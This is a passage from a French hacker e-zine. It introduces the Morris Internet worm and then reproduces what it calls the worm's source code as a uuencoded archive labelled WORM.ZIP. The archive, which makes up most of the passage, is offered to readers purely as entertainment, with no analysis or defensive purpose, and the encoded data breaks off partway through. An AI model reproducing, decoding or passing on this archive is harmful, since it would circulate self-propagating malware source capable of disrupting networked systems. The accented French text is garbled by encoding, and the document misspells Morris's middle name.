devriez savoir qui est RTM. Robert Tippett Morris est ce fils
d'un officiel de la NSA qui avait, il y a de cela quelques
ann‚es, paralys‚ le r‚seau Internet au grand complet, avec un
Worm de sa fabrication. Mais si vous avez lu le Hacker Crackdown
de Sterling (qui ‚tait dans le dernier numr‚o, je crois), vous
savez de quoi on parle ici.

Les sources du ver viennent d'apparaŒtre au d‚tour d'une
conf‚rence HP, et nous avons pens‚ vous divertir avec cette
chose. Naturellement, le tout est uencod‚...


begin 644

  
WORM.ZIP
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
MPDZ5JF9HCZPE+&\ZZ#"V=C!UIMK5;?+IY(U1+E)L\+PA5'"I+2@@<8DLJ
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
